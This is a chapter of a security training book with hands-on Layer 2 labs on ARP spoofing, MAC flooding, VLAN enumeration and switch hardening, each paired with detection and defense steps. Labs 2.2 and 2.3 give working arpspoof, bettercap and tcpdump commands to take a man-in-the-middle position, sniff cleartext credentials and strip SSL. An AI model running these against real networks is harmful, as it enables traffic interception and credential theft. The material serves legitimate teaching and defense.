Support This Book
Part III: Hands-On Labs Chapter 2

Layer 2 Attack Labs

MAC flooding, ARP spoofing, VLAN hopping, and switch security hands-on exercises

Chapter 2: Layer 2 Attack Labs

Lab Overview

These labs demonstrate Layer 2 attacks in a controlled environment. Only perform these exercises on networks you own or have explicit authorization to test.

Lab 2.1: ARP Cache Inspection

Objective

Understand normal ARP behavior before attacking it.

Difficulty: Beginner | Time: 20 minutes

Instructions

Part 1: View ARP Cache

# Linux
arp -a
ip neigh show

# Windows
arp -a

# macOS
arp -a

Part 2: Watch ARP Traffic

# Clear cache
sudo ip neigh flush all

# Start Wireshark filter: arp

# Ping gateway
ping -c 1 192.168.1.1

# Observe:
# 1. ARP Request broadcast
# 2. ARP Reply from gateway
# 3. Entry added to cache

Part 3: ARP Cache Analysis

# Check gateway entry
ip neigh show | grep 192.168.1.1

# Note: MAC address, state (REACHABLE, STALE)

# Watch entry age
watch -n 1 'ip neigh show'

Verification

  • Viewed ARP cache on your system
  • Captured ARP request/reply pair
  • Identified gateway MAC address
  • Observed cache entry states

Lab 2.2: ARP Spoofing Attack

Objective

Perform ARP spoofing to achieve MITM position.

Difficulty: Advanced | Time: 45 minutes

Environment

Lab Setup

Lab Setup:
├── Attacker: Kali (192.168.1.50)
├── Victim: Ubuntu (192.168.1.100)
├── Gateway: Router (192.168.1.1)
└── Network: Isolated VLAN

Warning

Only perform on YOUR isolated lab network. Never on production networks.

Instructions

Part 1: Enable IP Forwarding

# On Attacker
echo 1 > /proc/sys/net/ipv4/ip_forward

# Verify
cat /proc/sys/net/ipv4/ip_forward
# Should return: 1

Part 2: ARP Spoofing with arpspoof

# Terminal 1: Spoof gateway to victim
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

# Terminal 2: Spoof victim to gateway
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

# Keep both running

Part 3: Verify MITM Position

# On Victim: Check ARP cache
arp -a | grep 192.168.1.1
# Should show ATTACKER's MAC for gateway!

# On Attacker: Capture victim's traffic
sudo tcpdump -i eth0 host 192.168.1.100 -nn

Part 4: Traffic Observation

# On Attacker: Watch HTTP traffic
sudo tcpdump -i eth0 -A host 192.168.1.100 and tcp port 80

# On Victim: Browse to HTTP site
curl http://httpbin.org/post -d "password=secret123"

# On Attacker: Should see cleartext POST data

Blue Team Perspective

# Detection on victim:
# Watch for gateway MAC changes
watch -n 1 'arp -a | grep 192.168.1.1'

# Use arpwatch
sudo arpwatch -i eth0

# Static ARP entry (defense)
sudo arp -s 192.168.1.1 <real_gateway_mac>

Cleanup

# Stop arpspoof (Ctrl+C)
# ARP tables will self-correct

# Or manually restore on victim:
sudo ip neigh flush all

Verification

  • Achieved MITM position
  • Verified with ARP cache check
  • Captured victim traffic
  • Successfully cleaned up

Lab 2.3: ARP Spoofing with Bettercap

Objective

Use modern tool for ARP spoofing with additional capabilities.

Difficulty: Advanced | Time: 30 minutes

Instructions

Part 1: Basic ARP Spoof

# Start bettercap
sudo bettercap -iface eth0

# Enable net probe to discover hosts
» net.probe on

# Wait for hosts to be discovered
» net.show

# Target specific host
» set arp.spoof.targets 192.168.1.100
» set arp.spoof.fullduplex true
» arp.spoof on

# Enable sniffing
» net.sniff on

Part 2: Credential Sniffing

# Bettercap auto-detects credentials
# Watch output for captured passwords

# On victim, try HTTP login
# Bettercap displays: [http.post] username=admin&password=secret

Part 3: SSL Strip (Educational)

# NOTE: Modern HSTS defeats this
# Educational demonstration only

» set http.proxy.sslstrip true
» http.proxy on

# Downgrades HTTPS to HTTP where possible
# HSTS-protected sites will fail (expected)

Verification

  • Discovered hosts with net.probe
  • Achieved ARP spoof
  • Captured HTTP credentials
  • Observed SSL strip behavior

Lab 2.4: MAC Flooding (Conceptual)

Objective

Understand MAC flooding concepts and detection.

Difficulty: Intermediate | Time: 20 minutes

Note

Actual MAC flooding can crash switches. This lab focuses on understanding and detection rather than execution.

Instructions

Part 1: Understand the Attack

MAC Flooding Goal:
- Fill switch CAM table
- Switch reverts to hub behavior
- All traffic visible to attacker

Modern switches:
- Port security prevents this
- Most limit MACs per port

Part 2: Detection Exercise

# Generate pcap with MAC flood traffic (simulated)
# Or use sample capture from lab files

# In Wireshark, filter:
eth.src != <your_mac> and eth.dst != <your_mac>

# Signs of MAC flood:
# - Many source MACs from single port
# - Random/sequential MAC addresses
# - High broadcast traffic

Part 3: Switch Security (If Access)

! Cisco IOS - View MAC table
show mac address-table count

! Configure port security
interface GigabitEthernet0/1
  switchport port-security
  switchport port-security maximum 3
  switchport port-security violation restrict

Verification

  • Understand CAM table overflow concept
  • Know detection indicators
  • Understand port security countermeasure

Lab 2.5: VLAN Enumeration

Objective

Discover VLAN information from network traffic.

Difficulty: Intermediate | Time: 30 minutes

Instructions

Part 1: CDP/LLDP Discovery

# Capture discovery protocols
sudo tcpdump -i eth0 -v 'ether[12:2] == 0x88cc or ether proto 0x2000'

# Or in Wireshark
# Filter: cdp or lldp

# CDP/LLDP reveal:
# - Switch name
# - Native VLAN
# - Management VLAN
# - Port information

Part 2: Analyze CDP Frame

CDP Frame Contents (example):
- Device ID: switch01
- Platform: Cisco Catalyst 3750
- Native VLAN: 1
- Port ID: GigabitEthernet0/1
- Management Address: 192.168.1.1
- VTP Management Domain: CORP

Part 3: DTP Analysis

# DTP used for trunk negotiation
# Wireshark filter: dtp

# DTP reveals trunk status and allows switch spoofing
# Defense: "switchport nonegotiate" on all ports

Verification

  • Captured CDP or LLDP frames
  • Extracted VLAN information
  • Identified potential trunk ports

Lab 2.6: Switch Security Verification

Objective

Verify switch security controls are effective.

Difficulty: Beginner | Time: 30 minutes

Instructions

Part 1: Port Security Check

# From management access
show port-security interface Gi0/1
show port-security address

# Expected if secured:
# - Maximum MAC addresses set
# - Violation action configured
# - Current MAC addresses listed

Part 2: DAI Verification

show ip arp inspection

# Check if enabled on VLANs
# Check trusted vs untrusted ports

Part 3: DHCP Snooping

show ip dhcp snooping
show ip dhcp snooping binding

# Verify binding table populated
# Check trusted ports

Security Checklist

Layer 2 Security Verification:
□ Port security enabled on access ports
□ Port security violation action: restrict or shutdown
□ MAC address limit appropriate (1-3 for user ports)
□ DAI enabled on VLANs
□ DHCP snooping enabled
□ DHCP snooping trusted ports correct
□ DTP disabled (nonegotiate)
□ Native VLAN changed from default
□ BPDU Guard on access ports

Lab Summary

Skills Acquired

  • ARP cache analysis
  • ARP spoofing techniques
  • MITM positioning
  • Traffic interception
  • VLAN enumeration
  • Switch security verification

Key Learnings

  1. ARP has no authentication - anyone can claim any IP
  2. MITM enables powerful attacks - credential theft, injection
  3. Switch security features exist - they must be enabled
  4. Defense requires multiple layers - DAI, port security, segmentation

What You Learned (Defense)

For each attack, document the defense:

AttackDetectionPrevention
ARP Spoofarpwatch, DAI logsDAI, static ARP
MAC FloodCAM table alertsPort security
VLAN HopMonitor for DTPDisable DTP